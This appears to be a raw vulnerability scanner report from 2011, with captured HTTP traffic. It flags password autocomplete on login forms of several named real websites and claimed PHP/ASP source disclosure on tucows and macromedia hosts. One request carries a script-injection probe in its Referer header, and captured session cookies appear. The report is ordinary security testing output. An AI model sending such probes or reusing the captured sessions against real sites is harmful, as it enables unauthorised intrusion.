<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The page contains a form with the following action URL:
http://www.sfweekly.com/readers/login/
The form contains the following password field with autocomplete enabled:
data[Reader][password]
Request
GET /2010-08-11/news/ihelp-for-autism/ HTTP/1.1 Host: www.sfweekly.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
http://www.supertradeexchange.com/acct/login.asp
The form contains the following password field with autocomplete enabled:
pwd
Request
GET / HTTP/1.1 Host: www.supertradeexchange.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13237
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: itex%5Fpersist=anon=Y; expires=Fri, 03-Feb-2012 08:00:00 GMT; domain=www.supertradeexchange.com; path=/
Date: Thu, 03 Feb 2011 19:35:26 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>SuperTradeExchange® - a small business community and barter netwo ...[SNIP]... </h3> <form name="SignIn" action="/acct/login.asp" method="post" onkeyup="eval_button(event, this)"> <label for="login"> ...[SNIP]... </label> <input type="password" name="pwd" id="pwd"><br> ...[SNIP]...
The page contains a form with the following action URL:
http://www.thefutoncritic.com/myfuton.aspx
The form contains the following password field with autocomplete enabled:
password
Request
GET /devwatch/wright-vs-wrong/x22 HTTP/1.1
Host: www.thefutoncritic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kzhsyk55h14dmof1ovtfne55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:29:43 GMT
Connection: close
Content-Length: 20828
<html> <head> <title>Shows A-Z - wright vs wrong on abc | TheFutonCritic.com</title> <meta id="Meta_Description" name="Description" content="wright vs wrong on abc ... TheFutonCritic.com has wright ...[SNIP]... <td>
The form contains the following password fields with autocomplete enabled:
pw
pwc
Request
GET /preview/194850/x22 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The form contains the following password field with autocomplete enabled:
pw
Request
GET /preview/194850/x22 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.
Issue remediation
Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.
The application appears to disclose some server-side source code written in PHP.
Request
GET /includes/js/ajaxlib.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 02:21:40 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 11 Feb 2010 01:05:35 GMT
ETag: "454e8-adf-47f48bf8e75c0"
Accept-Ranges: bytes
Content-Length: 2783
Cache-Control: max-age=604800
Expires: Fri, 11 Feb 2011 02:21:40 GMT
Content-Type: application/javascript
function callAJAX(url, respHdlr, bPageView, failHdlr, callHdlr, bAsync) {
var bAsync = (bAsync == null ? true : bAsync); var req;
try { req = new XMLHttpRequest(); /* e.g. Firefox ...[SNIP]... or request variable. For example, // assuming you used javascript to set a cookie called "php_array" // to the value of a javascript array then you can restore the cookie // from PHP like this: // <?php // session_start(); // $my_array = unserialize(urldecode(stripslashes($_COOKIE['php_array']))); // print_r ($my_array); // ?> // /* This automatically converts both keys and values to strings. // The return string is not URL escaped, so you must call the // Javascript "escape()" function before you pass this string to PHP. * ...[SNIP]...
The application appears to disclose some server-side source code written in PHP and ASP.
Request
GET /get/flashplayer/current/swflash.cab HTTP/1.1
Host: fpdownload.macromedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 25 Oct 2010 23:47:03 GMT
ETag: "b72012-2a53a6-9bea6bc0"
Accept-Ranges: bytes
Content-Length: 2773926
Content-Type: text/plain
Date: Thu, 03 Feb 2011 22:06:12 GMT
Connection: close